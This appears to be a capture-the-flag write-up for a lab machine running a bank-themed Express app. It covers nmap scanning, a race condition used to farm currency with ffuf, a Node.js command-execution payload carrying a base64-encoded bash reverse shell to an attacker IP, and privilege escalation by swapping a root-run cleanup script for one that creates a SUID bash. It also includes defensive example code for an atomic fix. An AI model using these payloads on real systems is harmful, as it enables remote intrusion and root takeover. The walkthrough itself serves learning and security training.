Port scanning

nmap --min-rate=10000 -p- 10.10.148.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-17 02:42 UTC
Nmap scan report for ip-10-10-148-95.eu-west-1.compute.internal (10.10.148.95)
Host is up (0.0030s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:38:DE:53:EB:89 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
nmap -sT -sV -sC -O -p22,80 10.10.148.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-17 02:43 UTC
Nmap scan report for ip-10-10-148-95.eu-west-1.compute.internal (10.10.148.95)
Host is up (0.00052s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 519153a5af1a5a786762aed637a08e33 (RSA)
| 256 c17072cc82c3f33e5e0a6a054ef04c3c (ECDSA)
|_ 256 a2ea537ce1d760bcd39208a99d206b7d (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Racetrack Bank
|_http-server-header: nginx/1.14.0 (Ubuntu)
MAC Address: 02:38:DE:53:EB:89 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (94%), Linux 3.8 (94%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds
nmap --script=vuln -p22,80 10.10.148.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-17 02:43 UTC
Nmap scan report for ip-10-10-148-95.eu-west-1.compute.internal (10.10.148.95)
Host is up (0.00027s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
|_ /login.html: Possible admin folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-148-95.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-148-95.eu-west-1.compute.internal:80/create.html
| Form id: uname
| Form action: /api/create
|
| Path: http://ip-10-10-148-95.eu-west-1.compute.internal:80/login.html
| Form id: uname
|_ Form action: /api/login
MAC Address: 02:38:DE:53:EB:89 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 73.23 seconds

Getting a shell

The site turns out to be an Express application. First register an account, mikannse, and look around: the account is given one gold bar, and a super user can be bought for 10,000 gold bars. Gold bars can also be given to other users, so perhaps several accounts can be created to give gold to each other. Create a second account, mikannse1, and give its gold bar to the first account we created:

POST /api/givegold HTTP/1.1
Host: 10.10.148.95
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://10.10.148.95
Connection: close
Referer: http://10.10.148.95/giving.html
Cookie: connect.sid=s%3AFjCRuvQNkwxKBVpNzz9SEFIRAjKkhIyk.b1AWs0M9aSWPThhqOxAjP60uprQltWpVsb5RYzHtTXI
Upgrade-Insecure-Requests: 1

user=mikannse&amount=1

This shows the page calls the givegold API, and the gift goes through.

A race condition seems likely. Try giving mikannse's gold back to mikannse1, but this time send the requests in bulk with a fuzzer.

First create a list.txt containing ten lines of 1, like this:

1
1
1
...

ffuf -u http://10.10.148.95/api/givegold -X POST -w list.txt -H "Content-Type: application/x-www-form-urlencoded" -b "connect.sid=s%3Aw7_6OmRfjF3e3Vix3kRded1Gm4BfVn7p.uC193ipwKW9dYxKt9OGWuME8OY66qMRsYgEuV37TdKw" -d "user=mikannse1&amount=FUZZ"

Afterwards mikannse1 has 3 gold bars, from a single gold bar sent ten times in parallel!

Next, extend the wordlist and start farming gold (it feels a bit like farming Q coins).

I simply wrote a wordlist of forty-thousand-plus lines and started farming. Sometimes a response of length 79 comes back, which means that transfer failed, but farming back and forth between the two accounts always works eventually; I spent quite a while on this, which was tedious.
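To show why ten parallel requests can move more gold than the sender owns, here is an added example (not code from the room or its author) that models a "give gold" handler in the check-then-act shape alongside an atomic version, and fires concurrent transfers at both the way the ffuf loop above does. The account names and the store API (get, set, increment, decrementIfEnough) are assumptions; the room's real storage layer is not shown in this write-up.

```javascript
// Added example, not code from the room or its author: a model of the
// check-then-act race in a "give gold" handler, next to an atomic version.
// The store API and account names below are assumptions.

// Constructed in-memory account store standing in for the application database.
// Every method yields to the event loop once, like a real database round-trip;
// that gap is where concurrent requests interleave.
function makeStore(initialBalances) {
  const data = { ...initialBalances };
  return {
    async get(user) { await Promise.resolve(); return data[user]; },
    async set(user, value) { await Promise.resolve(); data[user] = value; },
    async increment(user, amount) { await Promise.resolve(); data[user] += amount; },
    // Conditional decrement with no await between the check and the write.
    // This models a conditional UPDATE ... WHERE balance >= amount (or a
    // transaction), which is what a real fix would use.
    async decrementIfEnough(user, amount) {
      await Promise.resolve();
      if (data[user] >= amount) { data[user] -= amount; return true; }
      return false;
    },
    snapshot() { return { ...data }; },
  };
}

// Vulnerable shape: read the balance, check it, then write a value derived
// from that stale read. Ten requests that all read "1" all pass the check.
async function giveGoldVulnerable(store, from, to, amount) {
  const balance = await store.get(from);
  if (balance < amount) return false;
  await store.set(from, balance - amount);
  await store.increment(to, amount);
  return true;
}

// Hardened shape: validate the amount (in Express, req.body.amount arrives as
// a string and must be parsed first), then let the store perform the check and
// the debit as one atomic step; only one of N concurrent requests wins.
async function giveGoldAtomic(store, from, to, amount) {
  if (!Number.isInteger(amount) || amount <= 0) return false;
  const debited = await store.decrementIfEnough(from, amount);
  if (!debited) return false;
  await store.increment(to, amount);
  return true;
}

// Fire N concurrent transfers of 1 gold from an account holding 1 gold and
// report how many were accepted and the resulting balances.
async function race(handler, requests = 10) {
  const store = makeStore({ mikannse: 1, mikannse1: 0 });
  const results = await Promise.all(
    Array.from({ length: requests }, () => handler(store, 'mikannse', 'mikannse1', 1)),
  );
  return { accepted: results.filter(Boolean).length, balances: store.snapshot() };
}

race(giveGoldVulnerable).then((r) => console.log('vulnerable:', JSON.stringify(r)));
race(giveGoldAtomic).then((r) => console.log('atomic:', JSON.stringify(r)));
```

With the vulnerable handler all ten requests are accepted and the recipient ends up with 10 gold from a sender who held 1; with the atomic handler exactly one succeeds. On the detection side, the same burst is visible in the access log as many identical POST /api/givegold requests from one session within a few milliseconds.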

Then buy the VIP upgrade directly. The VIP feature evaluates expressions, and since this is an Express application, just like a previous room, that gives Node.js command execution:

require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMS4zOC4yNDUvMTIzNCAwPiYx | base64 -d | bash').toString();

The base64 blob is a reverse shell.

Then, for persistence, generate an SSH key and use it to SSH in as the brian user.

Privilege escalation

There is a SUID binary in the admin directory that can modify and view the .account file, but it does not seem useful, and decompiling it in IDA turned up nothing exploitable; it may just be a rabbit hole. There is also a root-owned cleanupscript.sh. brian cannot write to that file, but because it sits in brian's home directory we have permission to rename it. When I created a testfile.txt it was deleted a little later, which means a scheduled task runs in that directory, so have it copy a SUID bash for us:

mv cleanupscript.sh cleanupscript.sh.bak

echo 'cp /bin/bash /home/brian/bash ;chmod +s /home/brian/bash;chmod +x /home/brian/bash' >cleanupscript.sh

Afterthoughts

Getting a shell and escalating privileges were both fairly easy; the race condition is the part worth studying. Hardly a hard-difficulty room.